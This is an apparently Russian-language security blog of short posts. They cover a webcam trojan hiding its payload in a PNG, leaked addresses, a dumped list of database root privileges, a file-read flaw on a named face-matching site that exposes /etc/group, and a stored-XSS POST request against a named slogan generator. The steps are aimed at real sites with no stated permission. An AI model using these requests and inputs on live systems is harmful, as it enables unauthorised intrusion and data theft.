security, безопасность, уязвимость, xss, sql-inj
Несколько дней назад начали активно вкилывать троян под видом софта для просмотра чужих веб-камер. Детектился .exe на тот момент всего тремя антивирусами. Ну и мне стало интересно, как он работает.
Оказалось что сам .exe является дотнетовским проектом и хитрым способом из себя извлекает основной файл трояна. Антиэвристика реализована в основном от таким мусором:
Самое интересное, что троян хранится в ресурсах в виде изображения в формате .png
А вот процедура расшифровки этого изображения:
Стоило отойти от инета на денёк, как с утра новости «Хакеры разместили на сайте Львовской обладминистрации фотографию Путина»
Всю малину обломали, лол.
Ну раз уж теперь это ни для кого не секрет, то немного инфы уж точно никому не повредит.
Гугл не дает спокойно жить и подсовывает магазины дальнего востока. Так что оно само как-то вышло: root@domotekhnika.ru dtshop@localhost
А еще зачем-то выдал мне репозитарий какой-то CMS Diafan, которую за деньги продают hxxps://g.onmaster.ru/Dima/diafan/tree/master
В голове аниме
В руках ПХП
В коде …ня ^_^
Ваша база у меня ;_;
Весёлые headers отдает quickmeme при запросе:
Server=Urmom runs Perl yo
X-BobbyTables=’; DROP TABLE serverheaders;
X-Tag=SelfishMan wuz here
Бывает зайдешь на правовой портал, чтобы о правах почитать. А там пригялдишься, поковыряешься и
[*] %root% (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
Смотрю сегодня народ новую развлекалочку себе нашёл. точнее не такую уж и новую, но не суть.
И так, встречаем сервис pictriev, который обещает нам на чистом русском языке «Найти двойника знаменитости в Интернете с помощью распознавания лица.» или «Measure similarity (how much they look alike) or identity (whether they are from the same person) between two faces.»
Загружаем картинку для исследования. Ничего интересного, только саму картинку показывают через урл вида:
hxxp://www.pictriev.com/imgj.php?thumbnail&imageid=d133cafff5aa
Переходим на hxxp://www.pictriev.com/fc.php При загрузке идет POST-запрос на адрес hxxp://www.pictriev.com/facedbj.php?findface&image=post
В такого вида урлах подсознательно хочется поиграть с параметрами. Меняю image=post на image=asdf и получаю ответ:
{"result":"FAIL","msg":"can not read asdf"}
О, он читает файлы! Ну-ка прочитай мне image=/etc/group
{"error":"FILE NOT FOUND","result":"FAIL","warning":"default output to /home/lhk/upload/24bd9aad91b.lfd"}
Ага, что-то прочитал, но обработать не смог + еще раскрыл пути. Но вот 24bd9aad91b.lfd напоминает о том, как показывает картинку imgj.php
Пробуем подставить:
hxxp://www.pictriev.com/imgj.php?thumbnail&imageid=24bd9aad91b
и получаем «The image cannot be displayed because it contains errors». Сохраняем страницу на диск и
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
…
ssh:x:103:
ssl-cert:x:104:
postfix:x:105:
postdrop:x:106:
lhk:x:1000:www-data
messagebus:x:107:
fuse:x:108:lhk
Потом, конечно, читаем imgj.php, fc.php и вообще все что хотим. И делаем сайт-конкурент.
Увидел сегодня ссылку на «Генератор слоганов — Erfa» и решил посмотреть.
Все просто. Вводишь текст — получаешь слоган. Например ввел я «wordpress» и получил слоган «Мужики выбирают wordpress.»
Поигравшись немного заметил, что все данные фильтруются и выгоды никакой. Но там есть чудесная кнопка «Хороший слоган», которая добавляет получившееся в базу. А вот в этом добавлении уже нет никаких проверок:
POST hxxp://erfa.ru/core/goodslogan.php HTTP/1.1
Host: erfa.ru
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: hxxp://erfa.ru/index.php
Content-Length: 60
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
goodslogan=Worpress. <а здесь можно ставить любые тэги>
А потом смотреть это все на /bestslogan.php
Так же есть там и «Вопрос и Ответ», в котором можно и вопрос и ответ менять и тоже никаких проверок:
POST hxxp://erfa.ru/core/goodaskdata.php HTTP/1.1
Host: erfa.ru
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: hxxp://erfa.ru/ask.php
Content-Length: 60
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
goodAskInput1=Вопрос?&goodAskInput2=Ответ!
А потом смотреть в /askdata.php
Мелочь, конечно, но приятно. А всякие SEO-бояре могут свои ссылки туда пропихивать, да ждать пока роботы их найдут.
Your security is bad and you should feel bad! 
Недавние комментарии